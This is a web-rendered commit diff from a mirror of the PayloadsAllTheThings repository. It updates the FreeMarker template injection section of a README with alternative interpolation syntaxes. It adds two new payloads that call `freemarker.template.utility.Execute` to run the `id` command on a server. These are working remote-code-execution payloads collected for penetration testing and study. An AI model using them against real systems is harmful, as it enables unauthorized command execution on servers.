mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
Update README.md
This commit is contained in:
parent
514ac98dac
commit
29c23ac7fd
1 changed files with 3 additions and 1 deletions
|
@ -199,7 +199,7 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre
|
|||
|
||||
### Freemarker - Basic injection
|
||||
|
||||
The template can be `${3*3}` or the legacy `#{3*3}`.
|
||||
The template can be `${3*3}` `#{3*3}` or the legacy `[=3*3]`.
|
||||
|
||||
### Freemarker - Read File
|
||||
|
||||
|
@ -214,6 +214,8 @@ Convert the returned bytes to ASCII
|
|||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||
${"freemarker.template.utility.Execute"?new()("id")}
|
||||
#{"freemarker.template.utility.Execute"?new()("id")}
|
||||
[="freemarker.template.utility.Execute"?new()("id")]
|
||||
```
|
||||
|
||||
### Freemarker - Sandbox bypass
|
||||
|
|
Loading…
Reference in a new issue